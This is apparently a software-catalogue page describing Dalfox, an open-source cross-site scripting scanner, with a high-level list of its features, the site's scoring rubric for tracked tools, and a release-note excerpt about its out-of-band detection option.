Dalfox

v3.2.3 open-source

Dalfox is an open-source XSSXSSCross-site scripting, an attack that runs malicious script in another user's browser through a trusted site. It can steal data or perform actions using the user's session. scanner and automation tool for reflected, stored, and DOMDOMThe browser's in-memory tree representation of a web page's structure, standardized by the W3C, giving cyber tools a programmable interface to read or manipulate page content at runtime.-based XSS, with parameter discovery and ASTASTAn abstract syntax tree, a structured representation of parsed code. Tools inspect or transform this tree to understand expressions and statements rather than just matching text.-level verification.

Summary

Dalfox is an open-source, free command-line scanner that finds and verifies cross-site scriptingcross-site scriptingCross-site scripting, an attack that runs malicious script in another user's browser through a trusted site. It can steal data or perform actions using the user's session. flaws, checking reflected, stored, and DOM-based cases by combining parameter analysis with AST-based JavaScript inspection instead of a headless browser. It also fingerprints WAFs, flags outdated front-end libraries, and can run out-of-band checks against interactsh servers, making it a fit for penetration testers and application security engineers who need XSS coverage inside a CI pipeline rather than a full web vulnerability scanner. Findings export as JSON, SARIFSARIFStatic Analysis Results Interchange Format, a standard for sharing code-analysis findings, including locations and rule details. It lets scanners report results to a common review interface., Markdown, or TOML, and a REST/MCPMCPModel Context Protocol, a standard for connecting AI applications to external tools and data sources. A compatible server exposes capabilities an assistant can use through a common interface. server mode lets it plug into automated pipelines or AI coding assistants. Written in Rust as a full rewrite of its earlier Go version, it has drawn 54 contributors and 915 commits in the past year, with a release 19 days ago.

Dalfox is an open-source XSS scanner and automation tool for reflected, stored, and DOM-based XSS, with parameter discovery and AST-level verification.

How Dalfox helps

Is a stored or blind XSS firing somewhere I can't see the response?

sends payloads that call back to an interactsh server, catching stored, asynchronous, and non-reflecting sinks that a synchronous scan would miss

Will this payload actually get through the WAF sitting in front of my target?

fingerprints the WAF with a confidence score and applies bypass mutations, including encoding tricks and inspection-window positioning tuned to what was detected

Are any of the front-end libraries this site loads known to be vulnerable?

fetches same-origin script bundles, runs them through AST analysis for DOM-XSS sinks, and separately flags outdated library versions as informational findings

Can this scan run as part of my CI pipeline and fail the build on real findings?

exits with distinct codes for clean, findings, and error states, and exports results as SARIF, Markdown, JSON, or TOML for direct pipeline consumption

Which stage of the scan should I trust when deep scan is enabled?

runs the same preflight probe regardless of scan depth, so WAF fingerprinting, CSP-bypass, technology detection, and DOM-XSS analysis all execute before the deeper payload pass begins

Each score is 0–100 on a published rubric, derived from data this site already shows. A dimension we cannot measure says so — it is never scored 0 and never enters a rank.

How this is scored
  • Shipping velocity — releases a month over the last 12 months, on a log scale where 16 a month scores 100. Needs 3 releases in the window.
  • Documentation quality — the release-notes rubric published on the analytics page, unchanged.
  • Breaking-change discipline — the share of releases carrying a breaking change (none scores 100, half or more scores 0). Only projects that label breaking changes are measured: a clean record cannot be told from an unlabelled one.
  • Maintenance risk — quiet time measured against the tool's own release cadence (quiet longer than 90 days and three typical gaps scores 0), plus the number of active maintainers and whether contributors are growing, where known. Higher is lower risk.
  • Innovation & surface — new capabilities in the feature ledger this year, API and MCP operations added, and the share of commits that are features: the mean of whichever we hold.
  • Community health (open-source tools only) — each is a direction, not a size: contributors this year against last, the bus factor now against a year ago, and issues closed per issue opened, where steady scores 50, doubled 100 and halved 0; plus the median time to a maintainer's first reply (an hour scores about 100, a month or more 0). A commercial card has no repository and carries none of the four.
  • Documented delivery (commercial tools) — when a vendor's documented new capabilities have slowed against its own baseline, that counts against the overall standing as heavily as two low dimensions. Steady delivery, or too little history to judge, leaves the standing alone; it is never a sixth score.
  • Open-source tools are scored on repository signals; commercial tools on their published changelog. Ranks compare tools within one category and one profile and need at least five measured peers; the overall standing needs three ranked dimensions. Best-in-breed or consolidator is a shape, not a quality, and is never scored.

Release-note detail over time

See how much detail Dalfox puts in its release notes, quarter by quarter, and compare it with tracked tools in the same category. This history uses up to ten retained, reviewed notes per tool; sparse or blank older quarters may reflect that limit.

new Blind/OAST XSS detection via managed interactsh channel

    With blind_oob, oast.fun, detection_method: "oob"

blind_oob is the managed OAST (interactsh) channel — the same thing the CLI's --blind-oob arms. Pass for the public mesh or a list of interactsh hosts (["oast.fun"]); Dalfox registers, correlates each callback to the payload that caused it, and polls on its own, so a callback becomes a V finding with detection_method: "oob" without you running a listener.

How we count

Read from 16 of 100 release notes and docs updates we hold for Dalfox. "First seen" is the earliest note that names something; "last" is the latest. Our history may start partway through Dalfox's life, so an old integration can show a recent first-seen date.

Each change counts once: "added 40 checks" is one line, so the numbers measure how often coverage moves, not how big the catalogue is or how well it detects.
